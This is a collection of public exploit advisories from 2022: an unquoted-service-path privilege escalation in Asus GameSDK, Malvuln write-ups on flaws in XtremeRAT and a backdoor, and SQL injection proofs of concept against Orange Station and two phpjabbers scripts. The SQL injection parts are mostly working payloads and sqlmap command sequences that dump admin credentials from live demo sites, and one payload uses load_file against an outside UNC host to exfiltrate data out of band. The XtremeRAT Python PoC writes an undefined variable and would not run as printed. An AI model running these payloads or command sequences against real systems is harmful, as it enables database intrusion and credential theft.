<pre><code># Exploit Title: Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path (Privilege Escalation)<br /># Date: 07/14/2022<br /># Exploit Author: Angelo Pio Amirante<br /># Version: 1.0.0.4<br /># Tested on: Windows 10<br /># Patched version: 1.0.5.0<br /># CVE: CVE-2022-35899<br /><br /><br /># Step to discover the unquoted service path:<br /><br />wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """<br /><br /># Info on the service:<br /><br />C:\>sc qc "GameSDK Service"<br />[SC] QueryServiceConfig OPERAZIONI RIUSCITE<br /><br />NOME_SERVIZIO: GameSDK Service<br /> TIPO : 10 WIN32_OWN_PROCESS<br /> TIPO_AVVIO : 2 AUTO_START<br /> CONTROLLO_ERRORE : 1 NORMAL<br /> NOME_PERCORSO_BINARIO : C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe<br /> GRUPPO_ORDINE_CARICAMENTO :<br /> TAG : 0<br /> NOME_VISUALIZZATO : GameSDK Service<br /> DIPENDENZE :<br /> SERVICE_START_NAME : LocalSystem<br /><br /># Exploit<br />If an attacker had already compromised the system and the current user has the privileges to write in the "C:\Program Files (x86)\ASUS\" folder or in "C:\" , he could place his own "Program.exe" or "GameSDK.exe" files respectively, and when the service starts, it would launch the malicious file, rather than the original "GameSDK.exe".<br /><br /># Impact<br />An attacker can elevate his privileges on the system and become NTAUTHORITY\SYSTEM.<br /><br /># Poc Video<br /><br />https://youtu.be/u_8JMIgn-5g<br /><br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/7f314e798c150aedd9ce41ed39318f65_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Builder XtremeRAT v3.7<br />Vulnerability: Insecure Crypto Bypass<br />Description: The malware builds backdoors and requires authentication to access the GUI using credentials stored in the "user.info" config file. XtremeRAT doesn't properly validate saved passwords are what the user actually set when saving them in user.info config. This can allow attackers who can guess the first few characters the ability to pad the rest with zeroes or whatever character they want, providing they guess the password length. The issue it seems is in Delphi 2009, default string type changed from ANSI, the MD5 implementation is not unicode aware generating incorrect hashes. Therefore, a user may enter the password "abc123" thinking that is the exact password which will grant access to the builder. However, the flaw allows attackers the ability to more easily bypass authentication as only part of the password will now be required as the remainder can be any characters E.g. abc000. Moreover, the hashing implementation used makes no use of a salt. Creating a similar password hash to logon, requires the resulting file size should be be 64 bytes not 32. If you just copy and paste a hash into a file you may see it is only 32 bytes, the one generated by XtremeRAT is 64 bytes as it is encoded.<br />Family: Xtreme<br />Type: PE32<br />MD5: 7f314e798c150aedd9ce41ed39318f65<br />Vuln ID: MVID-2022-0624<br />Disclosure: 07/15/2022<br /><br />Exploit/PoC:<br />import os, hashlib<br /><br />#Creates broken unicode MD5 hashes to change an existing XtremeRAT config password.<br />#By malvuln<br />#<br />#=================================================================================<br />#Basically, if the actual password is 'abc123' and was generated by XtremeRAT<br />#we only need to guess 3 out of 6 chars E.g. abc000<br />#as long as we can guess the length we can bypass the need to know the full password.<br />#We can also emulate broken passwords and replace "user.info" config with ours.<br /><br />passwd = u'abc'<br />tmp = hashlib.md5(passwd.encode('utf-16le'))<br /><br />print("[+] XtremeRAT v3.7 ")<br />print("[+] Password hash bypass created")<br />print("[+] By malvuln")<br />print("[-] " +tmp.hexdigest())<br />print("Login using abc000 or any last three chars!")<br /><br />#outputs: ce1473cf80c6b3fda8e3dfc006adc315<br />#HEX: 610062006300<br />#Login using abc000, abc!@# or abc123 it don't matter.<br /><br />XRat_Config="C:\\XtremeRAT_v3.7\\user.info"<br /><br />if os.path.exists(XRat_Config):<br /> os.remove(XRat_Config)<br />f=open(XRat_Config, "w", encoding='utf-16LE')<br />f.write(_hash2)<br />f.close()<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/7f314e798c150aedd9ce41ed39318f65.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Builder XtremeRAT v3.7<br />Vulnerability: Insecure Permissions<br />Description: The malware builds and writes a PE file to c drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. <br />Family: Xtreme<br />Type: PE32<br />MD5: 7f314e798c150aedd9ce41ed39318f65<br />Vuln ID: MVID-2022-0623<br />Disclosure: 07/15/2022<br /><br />Exploit/PoC:<br />C:\>cacls server.exe<br />C:\server.exe BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br /><br />C:\>dir server.exe<br /> Volume in drive C has no label.<br /><br /> Directory of C:\<br /><br />03/04/2022 02:56 AM 21,504 server.exe<br /> 1 File(s) 21,504 bytes<br /> 0 Dir(s) 26,072,932,352 bytes free<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/e3bb503f9b02cf57341695f30e31128f.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.HoneyPot.a<br />Vulnerability: Weak Hardcoded Password<br />Description: The malware listens on various TCP ports of which one can be port 21 when enabled. Authentication is required, however the credentials "usuario/senha" are weak and found within the PE file.<br />Family: HoneyPot<br />Type: PE32<br />MD5: e3bb503f9b02cf57341695f30e31128f<br />Vuln ID: MVID-2022-0622<br />Disclosure: 07/15/2022<br /><br />Exploit/PoC:<br />'senha' is password in Portuguese<br /><br />C:\>nc64.exe x.x.x.x 21<br />220 Wu-ftpd 1.6.9<br />USER usuario<br />331 Password required for usuario.<br />PASS senha<br />230 User usuario logged in.<br />SYST<br />215 UNIX Type: L8 Internet Component Suite<br />PASV<br />227 Entering Passive Mode (192,168,18,125,218,13).<br />STOR DOOM.exe<br />150 Opening data connection for DOOM.exe.<br />226 File received ok<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>## Title: Orange Station 1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 0.16.2022<br />## Vendor: https://www.mayurik.com/<br />## Software: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Orange-Station-1.0<br /><br /><br /><br />## Description:<br />The `username` parameter appears to be vulnerable to SQL injection attacks.<br />The attacker can take administrator accounts control and also of all<br />accounts, also the malicious user can download all information about<br />this system.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br />---<br />Parameter: username (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: username=mayuri.infospace@gmail.com'+(select<br />load_file('\\\\kh5oq0o5iyhgxexnhrx8pzcwyn4hs8mwdz1rohc6.beauty.com\\jlb'))+''<br />OR NOT 8287=8287 AND 'jOHi'='jOHi&password=rootadmin&login=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=mayuri.infospace@gmail.com'+(select<br />load_file('\\\\kh5oq0o5iyhgxexnhrx8pzcwyn4hs8mwdz1rohc6.beauty.com\\jlb'))+''<br />AND (SELECT 3074 FROM (SELECT(SLEEP(15)))cvLH) AND<br />'yPPS'='yPPS&password=rootadmin&login=<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Orange-Station-1.0)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/sz3tfi)<br /><br /><br /></code></pre>
<pre><code>┌┌────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr │ │ :<br />│ Website : phpjabbers.com │ │ │<br />│ Vendor : PHPJABBERS │ │ Property Listing Script │<br />│ Software : Property Listing Script 3.1 │ │ │<br />│ Vuln Type: Remote SQL Injection │ │ Script will give you │<br />│ Method : GET │ │ the tools to efficiently manage │<br />│ Critical : High [░░▒▒▓▓██] │ │ your own real estate portal │<br />│ Impact : Database Access │ │ │<br />│ │ │ │<br />│ ────────────────────────────────────────┘ └─────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Typically used for remotely exploitable vulnerabilities that can lead to │<br />│ system compromise. │<br />│ │<br />┌┌────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /> Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk<br /> loool, DevS, Dark-Gost<br /> CryptoJob (Twitter) twitter.com/CryptozJob<br />┌┌────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Live Demo Site:<br /><br />https://www.phpjabbers.com/property-listing-script/#sectionDemo<br /><br /><br />[INFO] GET parameter 'min_bedrooms' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable<br />GET parameter 'min_bedrooms' is vulnerable.<br /><br />sqlmap identified the following injection point(s) with a total of 414 HTTP(s) requests:<br /><br />---<br />Parameter: min_bedrooms (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND 7719=7719 AND (2759=2759<br /><br /> Type: error-based<br /> Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND GTID_SUBSET(CONCAT(0x716b627171,(SELECT (ELT(3030=3030,1))),0x71626a7871),3030) AND (5977=5977<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND (SELECT 2245 FROM (SELECT(SLEEP(5)))iJfC) AND (1861=1861<br />---<br /><br />sqlmap.py -u "https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1" --current-db --batch --random-agent --threads 5<br /><br />[INFO] the back-end DBMS is MySQL<br />web server operating system: Linux CentOS 6<br />web application technology: Apache 2.2.15<br />back-end DBMS: MySQL >= 5.6<br />[01:13:36] [INFO] fetching current database<br />[01:13:36] [INFO] retrieved: 'pjabbers_demo_pls'<br />current database: 'pjabbers_demo_pls'<br /><br />sqlmap.py -u "https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1" -D pjabbers_demo_pls --tables --batch --random-agent<br /><br />---<br />Parameter: min_bedrooms (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND 7719=7719 AND (2759=2759<br /><br /> Type: error-based<br /> Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND GTID_SUBSET(CONCAT(0x716b627171,(SELECT (ELT(3030=3030,1))),0x71626a7871),3030) AND (5977=5977<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND (SELECT 2245 FROM (SELECT(SLEEP(5)))iJfC) AND (1861=1861<br />---<br /><br />[INFO] the back-end DBMS is MySQL<br />web server operating system: Linux CentOS 6<br />web application technology: Apache 2.2.15<br />back-end DBMS: MySQL >= 5.6<br />Database: pjabbers_demo_pls<br /><br />[66 tables]<br />+----------------------------------------------------------------+<br />| 1657528735_303_pls_30_property_listing_features |<br />| 1657528735_303_pls_30_property_listing_fields |<br />| 1657528735_303_pls_30_property_listing_multi_lang |<br />| 1657528735_303_pls_30_property_listing_options |<br />| 1657528735_303_pls_30_property_listing_passwords |<br />| 1657528735_303_pls_30_property_listing_payments |<br />| 1657528735_303_pls_30_property_listing_periods |<br />| 1657528735_303_pls_30_property_listing_plugin_country |<br />| 1657528735_303_pls_30_property_listing_plugin_galleries_set |<br />| 1657528735_303_pls_30_property_listing_plugin_gallery |<br />| 1657528735_303_pls_30_property_listing_plugin_locale_languages |<br />| 1657528735_303_pls_30_property_listing_plugin_locale |<br />| 1657528735_303_pls_30_property_listing_plugin_log_config |<br />| 1657528735_303_pls_30_property_listing_plugin_log |<br />| 1657528735_303_pls_30_property_listing_plugin_one_admin |<br />| 1657528735_303_pls_30_property_listing_plugin_paypal |<br />| 1657528735_303_pls_30_property_listing_plugin_sms |<br />| 1657528735_303_pls_30_property_listing_properties_features |<br />| 1657528735_303_pls_30_property_listing_properties |<br />| 1657528735_303_pls_30_property_listing_roles |<br />| 1657528735_303_pls_30_property_listing_types |<br />| 1657528735_303_pls_30_property_listing_users |<br />| 1657921261_148_pls_30_property_listing_features |<br />| 1657921261_148_pls_30_property_listing_fields |<br />| 1657921261_148_pls_30_property_listing_multi_lang |<br />| 1657921261_148_pls_30_property_listing_options |<br />| 1657921261_148_pls_30_property_listing_passwords |<br />| 1657921261_148_pls_30_property_listing_payments |<br />| 1657921261_148_pls_30_property_listing_periods |<br />| 1657921261_148_pls_30_property_listing_plugin_country |<br />| 1657921261_148_pls_30_property_listing_plugin_galleries_set |<br />| 1657921261_148_pls_30_property_listing_plugin_gallery |<br />| 1657921261_148_pls_30_property_listing_plugin_locale_languages |<br />| 1657921261_148_pls_30_property_listing_plugin_locale |<br />| 1657921261_148_pls_30_property_listing_plugin_log_config |<br />| 1657921261_148_pls_30_property_listing_plugin_log |<br />| 1657921261_148_pls_30_property_listing_plugin_one_admin |<br />| 1657921261_148_pls_30_property_listing_plugin_paypal |<br />| 1657921261_148_pls_30_property_listing_plugin_sms |<br />| 1657921261_148_pls_30_property_listing_properties_features |<br />| 1657921261_148_pls_30_property_listing_properties |<br />| 1657921261_148_pls_30_property_listing_roles |<br />| 1657921261_148_pls_30_property_listing_types |<br />| 1657921261_148_pls_30_property_listing_users |<br />| pls_30_property_listing_features |<br />| pls_30_property_listing_fields |<br />| pls_30_property_listing_multi_lang |<br />| pls_30_property_listing_options |<br />| pls_30_property_listing_passwords |<br />| pls_30_property_listing_payments |<br />| pls_30_property_listing_periods |<br />| pls_30_property_listing_plugin_country |<br />| pls_30_property_listing_plugin_galleries_set |<br />| pls_30_property_listing_plugin_gallery |<br />| pls_30_property_listing_plugin_locale |<br />| pls_30_property_listing_plugin_locale_languages |<br />| pls_30_property_listing_plugin_log |<br />| pls_30_property_listing_plugin_log_config |<br />| pls_30_property_listing_plugin_one_admin |<br />| pls_30_property_listing_plugin_paypal |<br />| pls_30_property_listing_plugin_sms |<br />| pls_30_property_listing_properties |<br />| pls_30_property_listing_properties_features |<br />| pls_30_property_listing_roles |<br />| pls_30_property_listing_types |<br />| pls_30_property_listing_users |<br />+----------------------------------------------------------------+<br /><br />sqlmap.py -u "https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1" -D pjabbers_demo_pls -T pls_30_property_listing_users --columns --batch --random-agent<br /><br />fetching columns for table 'pls_30_property_listing_users' in database 'pjabbers_demo_pls'<br /><br />Database: pjabbers_demo_pls<br />Table: pls_30_property_listing_users<br /><br />[12 columns]<br />+------------+------------------+<br />| Column | Type |<br />+------------+------------------+<br />| created | datetime |<br />| email | varchar(255) |<br />| fax | varchar(255) |<br />| id | int(10) unsigned |<br />| ip | varchar(15) |<br />| is_active | enum('T','F') |<br />| last_login | datetime |<br />| name | varchar(255) |<br />| password | blob |<br />| phone | varchar(255) |<br />| role_id | int(10) unsigned |<br />| status | enum('T','F') |<br />+------------+------------------+<br /><br />sqlmap.py -u "https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1" -D pjabbers_demo_pls -T pls_30_property_listing_users -C email,password --dump --batch --random-agent<br /><br />fetching entries of column(s) 'email,password' for table 'pls_30_property_listing_users' in database 'pjabbers_demo_pls'<br /><br />Database: pjabbers_demo_pls<br />Table: pls_30_property_listing_users<br /><br />[1 entry]<br />+-----------------+----------+<br />| email | password |<br />+-----------------+----------+<br />| admin@admin.com | P@S13rd |<br />+-----------------+----------+<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr │ │ :<br />│ Website : phpjabbers.com │ │ │<br />│ Vendor : PHPJABBERS │ │ Travel Tours Script │<br />│ Software : Travel Tours Script V1.0 │ │ │<br />│ Vuln Type: Remote SQL Injection │ │ A content management solution for │<br />│ Method : GET │ │ travel agencies and tour operators │<br />│ Critical : High [░░▒▒▓▓██] │ │ │<br />│ Impact : Database Access │ │ │<br />│ ─────────────────────────────────────┘ └────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Typically used for remotely exploitable vulnerabilities that can lead to │<br />│ system compromise. │<br />│ │<br />┌┌────────────────────────────────────────────────────────────────────────────┐<br />┌┘ Exploit URL's ┌┘<br />└────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Live Demo Site:<br /><br />https://www.phpjabbers.com/travel-tours-script/#sectionDemo<br /><br />POC:<br /><br />https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1'[Injection]<br />GET parameter 'type' is vulnerable<br /><br />---<br />Parameter: type (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1) AND 8667=8667 AND (4844=4844<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1) AND (SELECT 7164 FROM (SELECT(SLEEP(5)))loCg) AND (7206=7206<br />---<br /><br />[+] Starting the Attack<br /><br /><br />sqlmap.py -u "https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" --current-db --batch --random-agent --no-cast<br /><br />the back-end DBMS is MySQL<br />web server operating system: Linux CentOS 6<br />web application technology: Apache 2.2.15<br />back-end DBMS: MySQL >= 5.0.12<br />[INFO] fetching current database<br />current database: 'pjabbers_demo_vpl'<br /><br /><br />sqlmap.py -u "https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl --tables --batch --random-agent --no-cast<br /><br /><br />[INFO] fetching tables for database: 'pjabbers_demo_vpl'<br />[INFO] fetching number of tables for database 'pjabbers_demo_vpl'<br />[INFO] resumed: 52<br /><br />+------------------------------------------+<br />| vacationpackages_comments |<br />| vacationpackages_countries |<br />| vacationpackages_enquiries |<br />| vacationpackages_features |<br />| vacationpackages_fields |<br />| vacationpackages_listings_availabilities |<br />| vacationpackages_listings_features |<br />| vacationpackages_listings |<br />| vacationpackages_multi_lang |<br />| vacationpackages_notifications |<br />| vacationpackages_options |<br />| vacationpackages_payments |<br />| vacationpackages_periods |<br />| vacationpackages_plugin_country |<br />| vacationpackages_plugin_galleries_set |<br />| vacationpackages_plugin_gallery |<br />| vacationpackages_plugin_locale_languages |<br />| vacationpackages_plugin_locale |<br />| vacationpackages_plugin_log_config |<br />| vacationpackages_plugin_log |<br />| vacationpackages_plugin_one_admin |<br />| vacationpackages_plugin_paypal |<br />| vacationpackages_prices |<br />| vacationpackages_roles |<br />| vacationpackages_types |<br />| vacationpackages_users |<br />| vacationpackages_comments |<br />| vacationpackages_countries |<br />| vacationpackages_enquiries |<br />| vacationpackages_features |<br />| vacationpackages_fields |<br />| vacationpackages_listings |<br />| vacationpackages_listings_availabilities |<br />| vacationpackages_listings_features |<br />| vacationpackages_multi_lang |<br />| vacationpackages_notifications |<br />| vacationpackages_options |<br />| vacationpackages_payments |<br />| vacationpackages_periods |<br />| vacationpackages_plugin_country |<br />| vacationpackages_plugin_galleries_set |<br />| vacationpackages_plugin_gallery |<br />| vacationpackages_plugin_locale |<br />| vacationpackages_plugin_locale_languages |<br />| vacationpackages_plugin_log |<br />| vacationpackages_plugin_log_config |<br />| vacationpackages_plugin_one_admin |<br />| vacationpackages_plugin_paypal |<br />| vacationpackages_prices |<br />| vacationpackages_roles |<br />| vacationpackages_types |<br />| vacationpackages_users |<br />+------------------------------------------+<br /><br /><br />sqlmap.py -u "https://demo.phpjabbers.com/1657905972_980/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl -T vacationpackages_users --columns --batch --random-agent --threads 5 --no-cast<br /><br />[INFO] fetching columns for table 'vacationpackages_users' in database 'pjabbers_demo_vpl'<br />Database: pjabbers_demo_vpl<br />Table: vacationpackages_users<br />[16 columns]<br /><br />+----------------+--------------------------------------------------------+<br />| Column | Type |<br />+----------------+--------------------------------------------------------+<br />| contact_fax | varchar(255) |<br />| contact_mobile | varchar(255) |<br />| contact_phone | varchar(255) |<br />| contact_title | enum('mr','mrs','miss','ms','dr','prof','rev','other') |<br />| contact_url | varchar(255) |<br />| created | datetime |<br />| email | varchar(255) |<br />| id | int(10) unsigned |<br />| ip | varchar(15) |<br />| is_active | enum('T','F') |<br />| last_login | datetime |<br />| name | varchar(255) |<br />| password | blob |<br />| phone | varchar(255) |<br />| role_id | int(10) unsigned |<br />| status | enum('T','F') |<br />+----------------+--------------------------------------------------------+<br /><br /><br />sqlmap.py -u "https://demo.phpjabbers.com/1657905972_980/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl -T vacationpackages_users -C email,password --dump --batch --random-agent --threads 5 --no-cast<br /><br />[INFO] fetching number of column(s) 'email,password' entries for table 'vacationpackages_users' in database 'pjabbers_demo_vpl'<br />Database: pjabbers_demo_vpl<br />Table: vacationpackages_users<br />[1 entry]<br /><br />+-----------------+------------------------+<br />| email | password |<br />+-----------------+------------------------+<br />|admin@admin.com | P@S13rd |<br />+-----------------+------------------------+<br /><br />[-] Done<br /><br /> <br />└─────────────────────────────────────────────────────────────────────────────┘<br /> <br />Greets:<br /> The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL<br /> CryptoJob (Twitter) twitter.com/CryptozJob<br />┌┌────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└────────────────────────────────────────────────────────────────────────────┘┘<br /></code></pre>